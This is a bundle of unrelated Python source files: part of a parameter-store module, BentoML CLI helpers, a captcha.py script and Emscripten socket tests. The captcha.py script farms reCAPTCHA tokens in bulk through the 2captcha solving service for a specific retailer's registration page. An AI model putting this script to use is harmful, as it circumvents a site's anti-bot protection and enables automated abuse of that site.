mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True)
self._vals = self._read_values_locked()
except:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, type, value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path+"/.lock", True)
lock.acquire()
try:
tmp_path = tempfile.mktemp(prefix=".tmp", dir=params_path)
with open(tmp_path, "wb") as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db=PARAMS):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db+"/d"):
with self.transaction(write=True):
pass
def clear_all(self):
shutil.rmtree(self.db, ignore_errors=True)
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
if __name__ == "__main__":
params = Params()
if len(sys.argv) > 2:
params.put(sys.argv[1], sys.argv[2])
else:
for k in keys:
pp = params.get(k)
if pp is None:
print("%s is None" % k)
elif all(chr(c) in string.printable for c in pp):
print("%s = %s" % (k, pp))
else:
print("%s = %s" % (k, binascii.hexlify(pp)))
# Test multiprocess:
# seq 0 100000 | xargs -P20 -I{} python common/params.py DongleId {} && sleep 0.05
# while python common/params.py DongleId; do sleep 0.05; done
|
utils.py
|
# Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import sys
import threading
import itertools
import time
import logging
from datetime import datetime
import humanfriendly
from tabulate import tabulate
from bentoml.cli.click_utils import _echo
from bentoml.utils import pb_to_yaml
from bentoml.exceptions import BentoMLException
logger = logging.getLogger(__name__)
class Spinner:
def __init__(self, message, delay=0.1):
self.spinner = itertools.cycle(['-', '/', '|', '\\'])
self.delay = delay
self.busy = False
self._screen_lock = None
self.thread = None
self.spinner_visible = False
sys.stdout.write(message)
def write_next(self):
with self._screen_lock:
if not self.spinner_visible:
sys.stdout.write(next(self.spinner))
self.spinner_visible = True
sys.stdout.flush()
def remove_spinner(self, cleanup=False):
with self._screen_lock:
if self.spinner_visible:
sys.stdout.write('\b')
self.spinner_visible = False
if cleanup:
sys.stdout.write(' ') # overwrite spinner with blank
sys.stdout.write('\r') # move to next line
sys.stdout.flush()
def spinner_task(self):
while self.busy:
self.write_next()
time.sleep(self.delay)
self.remove_spinner()
def __enter__(self):
if sys.stdout.isatty():
self._screen_lock = threading.Lock()
self.busy = True
self.thread = threading.Thread(target=self.spinner_task)
self.thread.start()
def __exit__(self, exception, value, tb):
if sys.stdout.isatty():
self.busy = False
self.remove_spinner(cleanup=True)
else:
sys.stdout.write('\r')
def parse_key_value_pairs(key_value_pairs_str):
result = {}
if key_value_pairs_str:
for key_value_pair in key_value_pairs_str.split(','):
key, value = key_value_pair.split('=')
key = key.strip()
value = value.strip()
if key in result:
logger.warning("duplicated key '%s' found string map parameter", key)
result[key] = value
return result
def echo_docker_api_result(docker_generator):
layers = {}
for line in docker_generator:
if "stream" in line:
cleaned = line['stream'].rstrip("\n")
if cleaned != "":
yield cleaned
if "status" in line and line["status"] == "Pushing":
progress = line["progressDetail"]
layers[line["id"]] = progress["current"], progress["total"]
cur, total = zip(*layers.values())
cur, total = (
humanfriendly.format_size(sum(cur)),
humanfriendly.format_size(sum(total)),
)
yield f"Pushed {cur} / {total}"
if "errorDetail" in line:
error = line["errorDetail"]
raise BentoMLException(error["message"])
def _print_deployment_info(deployment, output_type):
if output_type == 'yaml':
_echo(pb_to_yaml(deployment))
else:
from google.protobuf.json_format import MessageToDict
deployment_info = MessageToDict(deployment)
if deployment_info['state'] and deployment_info['state']['infoJson']:
deployment_info['state']['infoJson'] = json.loads(
deployment_info['state']['infoJson']
)
_echo(json.dumps(deployment_info, indent=2, separators=(',', ': ')))
def _format_labels_for_print(labels):
if not labels:
return None
result = [f'{label_key}:{labels[label_key]}' for label_key in labels]
return '\n'.join(result)
def _format_deployment_age_for_print(deployment_pb):
if not deployment_pb.created_at:
# deployments created before version 0.4.5 don't have created_at field,
# we will not show the age for those deployments
return None
else:
return human_friendly_age_from_datetime(deployment_pb.created_at.ToDatetime())
def human_friendly_age_from_datetime(dt, detailed=False, max_unit=2):
return humanfriendly.format_timespan(datetime.utcnow() - dt, detailed, max_unit)
def _print_deployments_table(deployments, wide=False):
from bentoml.yatai.proto.deployment_pb2 import DeploymentState, DeploymentSpec
table = []
if wide:
headers = [
'NAME',
'NAMESPACE',
'PLATFORM',
'BENTO_SERVICE',
'STATUS',
'AGE',
'LABELS',
]
else:
headers = ['NAME', 'NAMESPACE', 'PLATFORM', 'BENTO_SERVICE', 'STATUS', 'AGE']
for deployment in deployments:
row = [
deployment.name,
deployment.namespace,
DeploymentSpec.DeploymentOperator.Name(deployment.spec.operator)
.lower()
.replace('_', '-'),
f'{deployment.spec.bento_name}:{deployment.spec.bento_version}',
DeploymentState.State.Name(deployment.state.state)
.lower()
.replace('_', ' '),
_format_deployment_age_for_print(deployment),
]
if wide:
row.append(_format_labels_for_print(deployment.labels))
table.append(row)
table_display = tabulate(table, headers, tablefmt='plain')
_echo(table_display)
def _print_deployments_info(deployments, output_type):
if output_type == 'table':
_print_deployments_table(deployments)
elif output_type == 'wide':
_print_deployments_table(deployments, wide=True)
else:
for deployment in deployments:
_print_deployment_info(deployment, output_type)
|
captcha.py
|
# coding=utf-8
import random
import sys
import threading
import time
import requests, json, datetime, time, BeautifulSoup, pickle
# How many threads?
Hthreads = 10
sitekeyEnabled = False
repeat = True
repeatTime = '17:30' #end of the loop
# To-Add, how many does it have to run, False True, d is showing hour and minute
# in format '16:18'
#######
CaptchaList = []
active_threads = 0
sitekey = '6LdMmTkUAAAAABXe8KxK5NkZoXcwa1OCPx5XfRVf'
API_KEY = '' # ENTER YOUR API KEY
captcha_url = 'http://www.chanelatcolette.fr/en/mail-register/'
def main():
global CaptchaList
global sitekey
global API_KEY
global captcha_url
global headers
log('Welcome')
if sitekeyEnabled == True:
log('Retriving Sitekey')
sitekey = get_sitekey(captcha_url)
d = datetime.datetime.now().strftime('%H:%M') # print -> 16:18
# Shitty coding
if repeat == True:
while not str(d) == repeatTime:
for i in range(0,Hthreads):
t = threading.Thread(target=get_captcha, args=(API_KEY,sitekey,captcha_url))
t.daemon = True
t.start()
time.sleep(0.1)
# ce while empêche le while repeatTime de se terminer...
while not active_threads == 0 or active_threads == 1:
log('Active Threads ---------- ' + str(active_threads))
timeout = []
timeout.append(active_threads)
if timeout.count(active_threads) == 10:
break
time.sleep(5)
d = datetime.datetime.now().strftime('%H:%M')
timeout = []
else:
for i in range(0,Hthreads):
t = threading.Thread(target=get_captcha, args=(API_KEY,sitekey,captcha_url))
t.daemon = True
t.start()
time.sleep(0.1)
while not active_threads == 0 or active_threads == 1:
log('Active Threads ---------- ' + str(active_threads))
timeout = []
timeout.append(active_threads)
if timeout.count(active_threads) == 20:
break
time.sleep(5)
# Only tests to check if it's saving and working good
"""print CaptchaList
d = datetime.datetime.now().strftime('%H:%M')
with open(str(d)+'.txt','r') as f:
trump = pickle.load(f)
item = random.choice(trump)
print trump
print item"""
def log(event):
print('Captcha by Azerpas :: ' + str(datetime.datetime.now().strftime('%H:%M:%S')) + ' :: ' + str(event))
def get_sitekey(url):
if sitekeyEnabled == False:
log('Sitekey scraping is disabled, using the default value')
else:
session = requests.session()
log('Scraping sitekey')
session.get(url, headers=headers)
##### finding captcha sitekey with BeautifulSoup ####
def get_captcha(API_KEY,sitekey,captcha_url):
global active_threads
active_threads += 1
session = requests.session()
session.cookies.clear()
randomID = random.getrandbits(16)
log('Generating Captcha for task ID: ' + str(randomID))
captcha_id = session.post("http://2captcha.com/in.php?key={}&method=userrecaptcha&googlekey={}&pageurl={}".format(API_KEY, sitekey, captcha_url)).text.split('|')[1]
recaptcha_answer = session.get("http://2captcha.com/res.php?key={}&action=get&id={}".format(API_KEY, captcha_id)).text
while 'CAPCHA_NOT_READY' in recaptcha_answer:
print(recaptcha_answer)
time.sleep(3)
recaptcha_answer = session.get("http://2captcha.com/res.php?key={}&action=get&id={}".format(API_KEY, captcha_id)).text
try:
recaptcha_answer = recaptcha_answer.split('|')[1]
except IndexError:
print("Captcha error")
return
log('Captcha successfully obtained, task ID: ' + str(randomID))
saveCaptcha(recaptcha_answer,randomID)
log('Task ID ' + str(randomID) + ' is closing...')
active_threads -= 1
def saveCaptcha(recaptcha_answer, ID):
d = datetime.datetime.now().strftime('%H:%M')
log("Saving Captcha into '" + str(d) + ".txt', valid for 2 minutes")
try :
file = open(str(d)+'.txt','r')
print('Txt already exists, task ID: ' + str(ID))
try:
Filelist = pickle.load(file)
except EOFError:
print("--------------------")
print("Captcha error")
print("--------------------")
return
Filelist.append(recaptcha_answer)
file = open(str(d)+'.txt','w')
pickle.dump(Filelist,file)
#file.write(Filelist)
#file.write(str(recaptcha_answer))
#file.write('\n')
except IOError as e:
print('Creating txt, task ID: ' + str(ID))
file = open(str(d)+'.txt','w')
Filelist = []
Filelist.append(recaptcha_answer)
#file.write(Filelist)
pickle.dump(Filelist,file)
#file.write('\n')
print('Captcha successfuly saved, task ID: ' + str(ID))
CaptchaList.append(recaptcha_answer)
if __name__ == "__main__":
main()
|
test_sockets.py
|
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from __future__ import print_function
import multiprocessing
import os
import socket
import shutil
import sys
import time
import unittest
if __name__ == '__main__':
raise Exception('do not run this file directly; do something like: tests/runner.py sockets')
try:
import websockify
except Exception:
# websockify won't successfully import on Windows under Python3, because socketserver.py doesn't export ForkingMixIn.
# (On python2, ForkingMixIn was exported but it didn't actually work on Windows).
# Swallowing the error here means that this file can always be imported, but won't work if actually used on Windows,
# which is the same behavior as before.
pass
import clang_native
from runner import BrowserCore, no_windows, chdir
from tools import shared
from tools.shared import PYTHON, EMCC, NODE_JS, path_from_root, Popen, PIPE, WINDOWS, run_process, run_js, JS_ENGINES, CLANG_CC
npm_checked = False
NPM = os.path.join(os.path.dirname(NODE_JS[0]), 'npm.cmd' if WINDOWS else 'npm')
def clean_processes(processes):
for p in processes:
if (not hasattr(p, 'exitcode') or p.exitcode is None) and (not hasattr(p, 'returncode') or p.returncode is None):
# ask nicely (to try and catch the children)
try:
p.terminate() # SIGTERM
except OSError:
pass
time.sleep(1)
# send a forcible kill immediately afterwards. If the process did not die before, this should clean it.
try:
p.terminate() # SIGKILL
except OSError:
pass
class WebsockifyServerHarness(object):
def __init__(self, filename, args, listen_port, do_server_check=True):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.target_port = listen_port - 1
self.args = args or []
self.do_server_check = do_server_check
def __enter__(self):
# compile the server
# NOTE empty filename support is a hack to support
# the current test_enet
if self.filename:
proc = run_process([CLANG_CC, path_from_root('tests', self.filename), '-o', 'server', '-DSOCKK=%d' % self.target_port] + clang_native.get_clang_native_args() + self.args, clang_native.get_clang_native_env(), stdout=PIPE, stderr=PIPE)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen([os.path.abspath('server')])
self.processes.append(process)
# start the websocket proxy
print('running websockify on %d, forward to tcp %d' % (self.listen_port, self.target_port), file=sys.stderr)
wsp = websockify.WebSocketProxy(verbose=True, listen_port=self.listen_port, target_host="127.0.0.1", target_port=self.target_port, run_once=True)
self.websockify = multiprocessing.Process(target=wsp.start_server)
self.websockify.start()
self.processes.append(self.websockify)
# Make sure both the actual server and the websocket proxy are running
for i in range(10):
try:
if self.do_server_check:
server_sock = socket.create_connection(('localhost', self.target_port), timeout=1)
server_sock.close()
proxy_sock = socket.create_connection(('localhost', self.listen_port), timeout=1)
proxy_sock.close()
break
except IOError:
time.sleep(1)
else:
clean_processes(self.processes)
raise Exception('[Websockify failed to start up in a timely manner]')
print('[Websockify on process %s]' % str(self.processes[-2:]))
def __exit__(self, *args, **kwargs):
# try to kill the websockify proxy gracefully
if self.websockify.is_alive():
self.websockify.terminate()
self.websockify.join()
# clean up any processes we started
clean_processes(self.processes)
class CompiledServerHarness(object):
def __init__(self, filename, args, listen_port):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.args = args or []
def __enter__(self):
# assuming this is only used for WebSocket tests at the moment, validate that
# the ws module is installed
global npm_checked
if not npm_checked:
child = run_process(NODE_JS + ['-e', 'require("ws");'], check=False)
assert child.returncode == 0, '"ws" node module not found. you may need to run npm install'
npm_checked = True
# compile the server
proc = run_process([PYTHON, EMCC, path_from_root('tests', self.filename), '-o', 'server.js', '-DSOCKK=%d' % self.listen_port] + self.args)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen(NODE_JS + ['server.js'])
self.processes.append(process)
def __exit__(self, *args, **kwargs):
# clean up any processes we started
clean_processes(self.processes)
# always run these tests last
# make sure to use different ports in each one because it takes a while for the processes to be cleaned up
# Executes a native executable server process
class BackgroundServerProcess(object):
def __init__(self, args):
self.processes = []
self.args = args
def __enter__(self):
print('Running background server: ' + str(self.args))
process = Popen(self.args)
self.processes.append(process)
def __exit__(self, *args, **kwargs):
clean_processes(self.processes)
def NodeJsWebSocketEchoServerProcess():
return BackgroundServerProcess(NODE_JS + [path_from_root('tests', 'websocket', 'nodejs_websocket_echo_server.js')])
def PythonTcpEchoServerProcess(port):
return BackgroundServerProcess([PYTHON, path_from_root('tests', 'websocket', 'tcp_echo_server.py'), port])
class sockets(BrowserCore):
emcc_args = []
@classmethod
def setUpClass(cls):
super(sockets, cls).setUpClass()
print()
print('Running the socket tests. Make sure the browser allows popups from localhost.')
print()
# Use emscripten root for node module lookup. This is needed because the unit tests each
# run with CWD set to a temporary directory outside the emscripten tree.
print('Setting NODE_PATH=' + path_from_root('node_modules'))
os.environ['NODE_PATH'] = path_from_root('node_modules')
def test_sockets_echo(self, extra_args=[]):
sockets_include = '-I' + path_from_root('tests', 'sockets')
# Note: in the WebsockifyServerHarness and CompiledServerHarness tests below, explicitly use consecutive server listen ports,
# because server teardown might not occur deterministically (python dtor time) and is a bit racy.
# WebsockifyServerHarness uses two port numbers, x and x-1, so increment it by two.
# CompiledServerHarness only uses one. Start with 49160 & 49159 as the first server port addresses. If adding new tests,
# increment the used port addresses below.
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49161), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49162), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1'], 49163), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 49160), 0)]
for harness, datagram in harnesses:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, sockets_include])
def test_sockets_echo_pthreads(self, extra_args=[]):
self.test_sockets_echo(['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_sdl2_sockets_echo(self):
harness = CompiledServerHarness('sdl2_net_server.c', ['-s', 'USE_SDL=2', '-s', 'USE_SDL_NET=2'], 49164)
with harness:
self.btest('sdl2_net_client.c', expected='0', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_NET=2', '-DSOCKK=%d' % harness.listen_port])
def test_sockets_async_echo(self):
# Run with ./runner.py sockets.test_sockets_async_echo
sockets_include = '-I' + path_from_root('tests', 'sockets')
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ASYNC=1'], 49167), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1', '-DTEST_ASYNC=1'], 49168), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1', '-DTEST_ASYNC=1'], 49169), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_ASYNC=1'], 49166), 0)]
for harness, datagram in harnesses:
print('harness:', harness)
with harness:
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, '-DTEST_ASYNC=1', sockets_include])
# Deliberately attempt a connection on a port that will fail to test the error callback and getsockopt
print('expect fail')
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=49169', '-DTEST_ASYNC=1', sockets_include])
def test_sockets_echo_bigdata(self):
sockets_include = '-I' + path_from_root('tests', 'sockets')
# generate a large string literal to use as our message
message = ''
for i in range(256 * 256 * 2):
message += str(chr(ord('a') + (i % 26)))
# re-write the client test with this literal (it's too big to pass via command line)
input_filename = path_from_root('tests', 'sockets', 'test_sockets_echo_client.c')
input = open(input_filename).read()
output = input.replace('#define MESSAGE "pingtothepong"', '#define MESSAGE "%s"' % message)
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49172), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49173), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 49171), 0)]
for harness, datagram in harnesses:
with harness:
self.btest(output, expected='0', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram], force_c=True)
@no_windows('This test is Unix-specific.')
@unittest.skip('fails on python3 - ws library may need to be updated')
def test_sockets_partial(self):
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_partial_server.c'), [], 49180),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_partial_server.c'), [], 49181)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_partial_client.c'), expected='165', args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_down(self):
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_select_server_down_server.c'), [], 49190, do_server_check=False),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_select_server_down_server.c'), [], 49191)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_select_server_down_client.c'), expected='266', args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_closes_connection_rw(self):
sockets_include = '-I' + path_from_root('tests', 'sockets')
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49200),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49201)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_select_server_closes_connection_client_rw.c'), expected='266', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port])
@no_windows('This test uses Unix-specific build architecture.')
def test_enet(self):
# this is also a good test of raw usage of emconfigure and emmake
shared.try_delete('enet')
shutil.copytree(path_from_root('tests', 'enet'), 'enet')
with chdir('enet'):
run_process([PYTHON, path_from_root('emconfigure.py'), './configure'])
run_process([PYTHON, path_from_root('emmake.py'), 'make'])
enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + path_from_root('tests', 'enet', 'include')]
for harness in [
CompiledServerHarness(os.path.join('sockets', 'test_enet_server.c'), enet, 49210)
]:
with harness:
self.btest(os.path.join('sockets', 'test_enet_client.c'), expected='0', args=enet + ['-DSOCKK=%d' % harness.listen_port])
# This test is no longer in use for WebSockets as we can't truly emulate
# a server in the browser (in the past, there were some hacks to make it
# somewhat work, but those have been removed). However, with WebRTC it
# should be able to resurect this test.
# def test_enet_in_browser(self):
# shared.try_delete('enet')
# shutil.copytree(path_from_root('tests', 'enet'), 'enet')
# pwd = os.getcwd()
# os.chdir('enet')
# run_process([PYTHON, path_from_root('emconfigure'), './configure'])
# run_process([PYTHON, path_from_root('emmake'), 'make'])
# enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + path_from_root('tests', 'enet', 'include')]
# os.chdir(pwd)
# run_process([PYTHON, EMCC, path_from_root('tests', 'sockets', 'test_enet_server.c'), '-o', 'server.html', '-DSOCKK=2235'] + enet)
# def make_relay_server(port1, port2):
# print('creating relay server on ports %d,%d' % (port1, port2), file=sys.stderr)
# proc = run_process([PYTHON, path_from_root('tests', 'sockets', 'socket_relay.py'), str(port1), str(port2)])
# return proc
# with WebsockifyServerHarness('', [], 2235, 2234):
# with WebsockifyServerHarness('', [], 2237, 2236):
# pids = []
# try:
# proc = make_relay_server(2234, 2236)
# pids.append(proc.pid)
# self.btest(os.path.join('sockets', 'test_enet_client.c'), expected='0', args=['-DSOCKK=2237', '-DUSE_IFRAME=1'] + enet)
# finally:
# clean_pids(pids);
def test_webrtc(self): # XXX see src/settings.js, this is disabled pending investigation
self.skipTest('WebRTC support is not up to date.')
host_src = 'webrtc_host.c'
peer_src = 'webrtc_peer.c'
host_outfile = 'host.html'
peer_outfile = 'peer.html'
host_filepath = path_from_root('tests', 'sockets', host_src)
temp_host_filepath = os.path.join(self.get_dir(), os.path.basename(host_src))
with open(host_filepath) as f:
host_src = f.read()
with open(temp_host_filepath, 'w') as f:
f.write(self.with_report_result(host_src))
peer_filepath = path_from_root('tests', 'sockets', peer_src)
temp_peer_filepath = os.path.join(self.get_dir(), os.path.basename(peer_src))
with open(peer_filepath) as f:
peer_src = f.read()
with open(temp_peer_filepath, 'w') as f:
f.write(self.with_report_result(peer_src))
open(os.path.join(self.get_dir(), 'host_pre.js'), 'w').write('''
var Module = {
webrtc: {
broker: 'http://localhost:8182',
session: undefined,
onpeer: function(peer, route) {
window.open('http://localhost:8888/peer.html?' + route);
// iframe = document.createElement("IFRAME");
// iframe.setAttribute("src", "http://localhost:8888/peer.html?" + route);
// iframe.style.display = "none";
// document.body.appendChild(iframe);
peer.listen();
},
onconnect: function(peer) {
},
ondisconnect: function(peer) {
},
onerror: function(error) {
console.error(error);
}
},
setStatus: function(text) {
console.log('status: ' + text);
}
};
''')
open(os.path.join(self.get_dir(), 'peer_pre.js'), 'w').write('''
var Module = {
webrtc: {
broker: 'http://localhost:8182',
session: window.location.toString().split('?')[1],
onpeer: function(peer, route) {
peer.connect(Module['webrtc']['session']);
},
onconnect: function(peer) {
},
ondisconnect: function(peer) {
// Calling window.close() from this handler hangs my browser, so run it in the next turn
setTimeout(window.close, 0);
},
onerror: function(error) {
console.error(error);
},
},
setStatus: function(text) {
console.log('status: ' + text);
}
};
''')
run_process([PYTHON, EMCC, temp_host_filepath, '-o', host_outfile] + ['-s', 'GL_TESTING=1', '--pre-js', 'host_pre.js', '-s', 'SOCKET_WEBRTC=1', '-s', 'SOCKET_DEBUG=1'])
run_process([PYTHON, EMCC, temp_peer_filepath, '-o', peer_outfile] + ['-s', 'GL_TESTING=1', '--pre-js', 'peer_pre.js', '-s', 'SOCKET_WEBRTC=1', '-s', 'SOCKET_DEBUG=1'])
# note: you may need to run this manually yourself, if npm is not in the path, or if you need a version that is not in the path
run_process([NPM, 'install', path_from_root('tests', 'sockets', 'p2p')])
broker = Popen(NODE_JS + [path_from_root('tests', 'sockets', 'p2p', 'broker', 'p2p-broker.js')])
expected = '1'
self.run_browser(host_outfile, '.', ['/report_result?' + e for e in expected])
broker.kill()
def test_nodejs_sockets_echo(self):
# This test checks that sockets work when the client code is run in Node.js
# Run with ./runner.py sockets.test_nodejs_sockets_echo
if NODE_JS not in JS_ENGINES:
self.skipTest('node is not present')
sockets_include = '-I' + path_from_root('tests', 'sockets')
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 59162), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 59164), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59160), 0)]
# Basic test of node client against both a Websockified and compiled echo server.
for harness, datagram in harnesses:
with harness:
run_process([PYTHON, EMCC, path_from_root('tests', 'sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram], stdout=PIPE, stderr=PIPE)
out = run_js('client.js', engine=NODE_JS, full_output=True)
self.assertContained('do_msg_read: read 14 bytes', out)
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
# Test against a Websockified server with compile time configured WebSocket subprotocol. We use a Websockified
# server because as long as the subprotocol list contains binary it will configure itself to accept binary
# This test also checks that the connect url contains the correct subprotocols.
print("\nTesting compile time WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59166)
]:
with harness:
run_process([PYTHON, EMCC, path_from_root('tests', 'sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '-s', 'SOCKET_DEBUG=1', '-s', 'WEBSOCKET_SUBPROTOCOL="base64, binary"', '-DSOCKK=59166'], stdout=PIPE, stderr=PIPE)
out = run_js('client.js', engine=NODE_JS, full_output=True)
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained(['connect: ws://127.0.0.1:59166, base64,binary', 'connect: ws://127.0.0.1:59166/, base64,binary'], out)
